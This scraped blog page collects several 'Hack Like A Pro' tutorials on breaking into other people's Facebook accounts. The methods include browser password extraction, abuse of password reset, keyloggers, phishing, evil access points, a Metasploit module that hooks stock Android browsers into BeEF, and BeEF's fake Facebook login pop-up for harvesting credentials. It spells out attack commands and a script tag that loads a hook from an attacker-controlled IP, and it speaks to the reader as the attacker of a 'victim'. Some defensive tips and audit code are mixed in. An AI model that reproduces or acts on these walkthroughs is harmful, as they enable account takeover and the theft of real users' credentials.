
Jul 11, 2017
Password Extraction for facebook- With software for password extraction - Hack Like A Pro | Hacking Facebook (step by step within images)
Welcome back, my novice hackers!
As we saw in my first tutorial on Facebook hacking, it is not a simple task. However, with the right skills and tools, as well as persistence and ingenuity, nothing is beyond our capabilities.
One of the cardinal rules of hacking is: "If I can get physical access to the computer... GAME OVER!" This means that if I am given even just a few moments with the machine itself, I can hack anything I want from that computer, including Facebook passwords.
I recognize that not all of you are technically savvy, though that doesn't mean you can't be with some hard work. So this Facebook hack is for those of you without either the technical savvy or the work ethic to become so. All you need is a moment or two of unfettered physical access to the target's computer and you can easily have their Facebook password.
Remember Me?
This hack relies upon the fact that most of us want websites to remember us when we return. We don't want to put in our username and password every time we want to access the site, so we tell the browser to "Remember me." In that way, we don't need to re-authenticate and provide our password, our system simply remembers it and provides it to the website.
Of course, those passwords must be stored somewhere on our computer. The key is to know where those passwords are stored and how to crack the hashed passwords when we find them. For instance, Mozilla stores users' passwords at:
c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entries
As you can see in the screenshot below, I have displayed that directory and password hashes from a Windows 7 computer running Firefox 36. These are all the saved passwords from various websites that Firefox has stored.
Note that the location of these passwords is in different places for each browser and sometimes in different places on different operating systems with the same browser. Look for more on this subject in my Digital Forensics series in the near future.
Elcomsoft's Facebook Password Extraction Tool
Fortunately for us, there is a company in Russia named Elcomsoft.
This company employs first-rate cryptographers and they develop and sell software to crack various password encryption schemes. (As a side note, a cryptographer from Elcomsoft was the first person arrested and prosecuted under the DMCA when he came to the U.S. for a conference. He was eventually acquitted.)
Their software is listed as digital forensic tools, but they can just as easily be used for hacking purposes. One of their tools was used for the iCloud hack that revealed nude photos of Jennifer Lawrence and other Hollywood stars in August 2014.
Elcomsoft developed a Windows tool named Facebook Password Extractor (FPE, for short) that extracts the user's Facebook password from its location on the user's system (the user must have used the "Remember me" feature) and then cracks it. Of course, we need physical access to the system to do this in most cases. Alternatively, if we can hack their system, we could upload this tool to the target system and then use it or we could simply download the user's browser password file and use this tool locally on our system.
You can download this free tool from Elcomsoft's website, which officially supports the following web browsers (though it may work on newer versions).
- Microsoft Internet Explorer (up to IE9)
- Mozilla Firefox (up to Firefox 4)
- Apple Safari (up to Safari 5)
- Opera (up to Opera 11)
- Google Chrome (up to Chrome 11)
The process of using this tool is almost idiot-proof. (Almost a requirement for Facebook hacking, wouldn't you agree?) You simply install it on the system whose Facebook password you want to extract and it does everything else.
One of the drawbacks to using this tool is that Elcomsoft released it back in 2011 and it has not been updated since. Maybe we should make this a Python project for the Null Byte community in the near future?
Look for more on Facebook hacking and developing the skills and arts of a professional hacker here in the near future, my novice hackers!
Jan 03, 2023
Ways To Hack Facebook - Hack Like A Pro | Hacking Facebook
Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to record-breaking numbers, with over 1.94 billion monthly active users as of March 2017 and around 1.28 billion daily active users.
We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. Clinical psychologists have written entire books detailing the surprisingly extensive impact Facebook has on our emotions and relationships.
But we sometimes forget who's watching.
We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities — and that's just with the visible information we purposely give away through our public Facebook profile.
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into someone's Facebook account.
It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà — you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.
Method 1: Reset the Password
The easiest way to "hack" into someone's Facebook is through resetting the password. This is more easily done by people who are friends with the person they're trying to hack.
- The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section. Still stuck? Hackers use scraping tools like TheHarvester to mine for email addresses, so check out our guide here to find a user's email that you don't already know.
- Next, click on "Forgotten your password?" and type in the victim's email. Their account should come up. Click "This is my account."
- It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press "No longer have access to these?"
- It will now ask "How can we reach you?" Type in an email that you have that also isn't linked to any other Facebook account.
- It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
- If you don't figure out the question, you can click on "Recover your account with help from friends." This allows you to choose between three and five friends.
- It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.
How to Protect Yourself
- Use an email address specifically for your Facebook and don't put that email address on your profile.
- When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries — not even third grade teacher's names. It's as easy as looking through a yearbook.
- Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.
Method 2: Use a Keylogger
Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
Null Byte features an excellent guide on how to get a keylogger on a target computer to get you started. If this isn't what you're looking for, you can search for free keyloggers or try coding a basic keylogger yourself in C++.
Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it into your own computer and extracting the data.
There are several options available for hardware keyloggers. Wired keyloggers like the Keyllama can be attached to the victim's computer to save keystrokes and work on any operating system, provided you have physical access to retrieve the device later. If you're looking to swipe the passwords remotely, you can invest in a premium Wi-Fi enabled keylogger which can email captured keystrokes or be accessed remotely over Wi-Fi.
How to Protect Yourself
- Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
- Install a password manager. Keyloggers can't steal what you don't type. Password managers automatically fill out important forms without you having to type anything in.
- Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
- Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.
Method 3: Phishing
This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.
The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the Facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.
How to Protect Yourself
- Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
- Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
- Use anti-virus & web security software, like Norton or McAfee.
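The "check the URL" advice above can be made mechanical. The following is an added example, not part of the original article; the function name, the trusted-domain list and the sample links are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption for this example: the registrable domains accepted as the real site.
TRUSTED_DOMAINS = ("facebook.com",)


def check_login_link(url, trusted=TRUSTED_DOMAINS):
    """Return the reasons a login link should not be trusted (empty list = passes)."""
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").rstrip(".")
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return ["malformed URL"]

    problems = []
    if parts.scheme != "https":
        problems.append("not HTTPS")
    if parts.username is not None:
        # In https://facebook.com@other.example/ the real host is other.example.
        problems.append("userinfo before '@' hides the real host")
    if port not in (None, 443):
        problems.append("non-default port")
    if not host:
        problems.append("no host")
        return problems

    try:
        ipaddress.ip_address(host)
        problems.append("host is a bare IP address")
    except ValueError:
        pass
    if not host.isascii() or any(l.startswith("xn--") for l in host.split(".")):
        problems.append("internationalised label, possible lookalike")

    # The trusted domain must be the END of the host name, on a label boundary,
    # so "facebook.com.something.example" and "notfacebook.com" both fail.
    if not any(host == d or host.endswith("." + d) for d in trusted):
        problems.append("host is not a trusted domain")
    return problems


if __name__ == "__main__":
    # Constructed sample links.
    for link in (
        "https://www.facebook.com/login.php",
        "https://www.facebook.com.account-verify.example/login",
        "https://facebook.com@203.0.113.7/login",
    ):
        print(link, "->", check_login_link(link) or "ok")
```

A link that passes these checks is only syntactically plausible; going to the site directly, as the list above recommends, remains the stronger habit.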
Method 4: Man in the Middle Attack
If you can get close to your target, you can trick them into connecting to a fake Wi-Fi network to steal credentials via a Man In The Middle (MITM) attack. Tools like the Wi-Fi Pumpkin make creating a fake Wi-Fi network as easy as sticking a $16 Wireless Network Adapter on the $35 Raspberry Pi and getting close to your target. Once the victim connects to your fake network, you can inspect the traffic or route them to fake login pages. You can even set it to only replace certain pages and leave other pages alone.
This little computer can create an evil AP - a cloned wireless network to trick the user into connecting so you can listen in on their traffic. (Image by SADMIN/Null Byte)
How to Protect Yourself
- Don't connect to any open (unencrypted) Wi-Fi Networks.
- Especially don't connect to any Wi-Fi networks that are out of place. Why might you see a "Google Starbucks" when there's no Starbucks for miles? Because hackers know your phone or computer will automatically connect to it if you have used a network with the same name before.
- If you have trouble connecting to your Wi-Fi, look at your list of nearby networks to see if there are any copies of your network name nearby.
- If your router asks you to enter the password for a firmware update to enable the internet or shows you a page with major spelling or grammar errors, it is likely you're connected to a fake hotspot and someone nearby is trying to steal your credentials.
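Looking for copies of your own network name can be automated. This is an added example, not from the original article: the scan listing format, the network names, the MAC addresses and the saved-network profile are all constructed assumptions.

```python
# Constructed scan listing, one network per line: SSID,BSSID,security,signal(dBm).
# The format is an assumption for this example, not the output of a specific tool.
SCAN = """\
HomeNet,a4:2b:b0:11:22:33,WPA2,-48
HomeNet,02:13:37:aa:bb:cc,OPEN,-30
Cafe, Free WiFi,6c:5a:b0:44:55:66,OPEN,-70
HomeNet,a4:2b:b0:11:22:34,WPA2,-60
"""

# Networks this device has saved: the protection and access points you expect.
KNOWN = {"HomeNet": {"security": "WPA2", "bssids": {"a4:2b:b0:11:22:33"}}}

SECURITY_RANK = {"OPEN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}


def parse_scan(text):
    """Parse the listing; rsplit keeps SSIDs that themselves contain commas."""
    networks = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ssid, bssid, security, signal = line.rsplit(",", 3)
        networks.append({
            "ssid": ssid,
            "bssid": bssid.strip().lower(),
            "security": security.strip().upper(),
            "signal": int(signal),
        })
    return networks


def find_suspect_aps(networks, known=KNOWN):
    """Return (ssid, bssid, severity) for copies of a saved network name."""
    findings = []
    for net in networks:
        profile = known.get(net["ssid"])
        if profile is None:
            continue  # not a name this device would join automatically
        seen = SECURITY_RANK.get(net["security"], 0)
        expected = SECURITY_RANK[profile["security"]]
        if seen < expected:
            # Same name, weaker protection: the fake-hotspot pattern described above.
            findings.append((net["ssid"], net["bssid"], "high"))
        elif net["bssid"] not in profile["bssids"]:
            # Same name and protection but an unfamiliar radio: this may be a
            # second legitimate access point, so it is flagged for a human look.
            findings.append((net["ssid"], net["bssid"], "review"))
    return findings


if __name__ == "__main__":
    for ssid, bssid, severity in find_suspect_aps(parse_scan(SCAN)):
        print(f"[{severity}] {ssid} advertised by {bssid}")
```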
A Couple More Facebook Hacks
For those with a bit more technical skill, check out the Same Origin Policy Facebook hack and the somewhat easier Facebook Password Extractor. We will continue to add more Facebook hacks in the near future, so keep coming back here.
How to Protect Yourself
- On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
- Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
- Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
- Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
- Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.
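The list above is the user's side of sidejacking; the site's side is to make sure the session cookie can never travel over plain HTTP. The check below is an added example that goes beyond the original article: the response headers are constructed and the cookie names `session_id` and `theme` are hypothetical.

```python
# Constructed response headers from a login endpoint (weak, then corrected).
WEAK_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "session_id=abc123; Path=/; HttpOnly"),
    ("Set-Cookie", "theme=dark; Path=/"),
]
HARDENED_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session_id=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "theme=dark; Path=/"),
]


def parse_set_cookie(value):
    """Split one Set-Cookie value into (name, {attribute: value}), keys lower-cased."""
    first, *rest = value.split(";")
    name = first.strip().partition("=")[0]
    attrs = {}
    for item in rest:
        key, _, val = item.strip().partition("=")
        if key:
            attrs[key.lower()] = val
    return name, attrs


def hsts_enabled(value):
    """True when the header carries a positive max-age."""
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age":
            val = val.strip('"')
            return val.isdigit() and int(val) > 0
    return False


def audit_session_headers(headers, session_cookies=("session_id",)):
    """Return the sidejacking-relevant weaknesses in a list of (name, value) headers."""
    issues = []
    hsts = False
    for name, value in headers:
        lname = name.lower()
        if lname == "strict-transport-security":
            hsts = hsts or hsts_enabled(value)
        elif lname == "set-cookie":
            cookie, attrs = parse_set_cookie(value)
            if cookie not in session_cookies:
                continue  # preference cookies are not what a sniffer is after
            if "secure" not in attrs:
                # Without Secure the browser also sends it on http:// requests.
                issues.append(f"{cookie}: no Secure attribute")
            if "httponly" not in attrs:
                issues.append(f"{cookie}: no HttpOnly attribute")
    if not hsts:
        # Without HSTS the first request to the site can still go out unencrypted.
        issues.append("no Strict-Transport-Security header")
    return issues


if __name__ == "__main__":
    print("weak:    ", audit_session_headers(WEAK_HEADERS))
    print("hardened:", audit_session_headers(HARDENED_HEADERS))
```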
Protecting Yourself: Less Is More
Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.
Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.
If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.
Bonus: If you're interested in who's checking you out, there are some ways you can (kind of) track who's viewed your Facebook profile.
More Password-Hacking Guides
For more info on cracking passwords, check out our guides on hacking Linux passwords, hacking Windows passwords, and our super-easy beginner's guide on hacking Wi-Fi passwords (or for newer wireless routers, how to crack WPA2-PSK wifi passwords).
Jul 18, 2017
Ways To Hack Facebook - Hack Like A Pro | @technicalsabuwala || Hacking Facebook - How to Hack Facebook, Part 1 (Same-Origin Policy)
Welcome back, my budding hackers!
This is the initial post of a new series on how to hack Facebook. It's important to note here that each hack I'll be covering is very specific. I have said it before, but I feel I need to repeat it again: there is NO SILVER BULLET that works under all circumstances. Obviously, the good folks at Facebook have taken precautions to make certain that their app is not hacked, but if we are creative, persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them a penny!
If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."
In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place it in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack, to get the password, etc.
In this first entry in this series, we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.
Same Origin Policy
Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
For those of you who are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.
Step 1: Open Metasploit
Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.
Step 2: Find the Exploit
Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.
Step 4: Show Options
Next, let's see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Step 5: Open BeEF
Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are unfamiliar with the tool.
Step 6: Set JS to BeEF Hook
Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /
Step 7: Run the Server
Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run
Step 8: Navigate to the Website from an Android Browser
Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.
Step 9: Hook Browser
When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!
Step 10: Detect if the Browser Is Authenticated to Facebook
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.
Jul 25, 2017
How to Get Facebook Credentials Without Hacking Facebook - Hack Like A Pro | Hacking Facebook in just 5 mins
Welcome back, my tenderfoot hackers!
Many people come to Null Byte looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills, and skill development is what Null Byte is all about.
Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux, this won't work for you—but if you are willing to take a little time to study here at Null Byte, you can probably gain access to someone's Facebook credentials very easily with this little trick.
(All Facebook users should take note of this if you don't want to get hacked.)
Step 1: Install Kali (If You Haven't Done So Already)
The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.
Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.
Step 2: Open BeEF
Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.
When you click on it, it starts BeEF by opening a terminal.
BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.
You will then be greeted by BeEF's "Getting Started" screen.
Step 3: Hook the Victim's Browser
This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.
The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as "Click here for more information" or "Click here to see the video." Use your imagination.
The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; you might also use the MitMf to send the code to the user, but this requires more skill.)
<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.
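Seen from the defender's side, a tag like the one above stands out in a page audit because it pulls script from an origin the site never approved, which is the same allowlist a Content-Security-Policy `script-src` directive expresses. The audit below is an added example, not part of the original tutorial; `shop.example`, `cdn.example` and the sample page are constructed, and only the hook URL is taken from the text.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed page: one same-origin script, one allowlisted CDN script, and
# the hook tag shown above.
PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
</head><body>Click here to see the video.</body></html>
"""


def origin(url):
    """(scheme, host, port) with the default port filled in."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or DEFAULT_PORTS.get(p.scheme))


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> element."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def audit_scripts(page_url, html, allowed_origins=()):
    """Return (script URL, reasons) for scripts loaded from unapproved origins."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed = {origin(o) for o in allowed_origins} | {origin(page_url)}
    findings = []
    for src in collector.sources:
        full = urljoin(page_url, src)  # resolves relative and //host forms
        scheme, host, port = origin(full)
        if (scheme, host, port) in allowed:
            continue
        reasons = ["origin not on the allowlist"]
        if scheme == "http":
            reasons.append("loaded over plain HTTP")
        try:
            ipaddress.ip_address(host or "")
            reasons.append("host is an IP literal")
        except ValueError:
            pass
        if port != DEFAULT_PORTS.get(scheme):
            reasons.append("non-default port")
        findings.append((full, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in audit_scripts("https://shop.example/index.html", PAGE,
                                      ["https://cdn.example"]):
        print(url, "->", "; ".join(reasons))
```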
Step 4: Send a Dialog Box to the User
When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.
If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the "Commands" tab.
Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.
This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.
If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type, then click on the "Execute" button at the bottom.
Step 5: The Dialog Box Appears on the Target System
When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.
Step 6: Harvest the Credentials
Back on our system in the BeEF interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.
If you are really determined to get those Facebook credentials, it can most definitely be done, and this is just one way of many methods (but probably the simplest).
If you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!





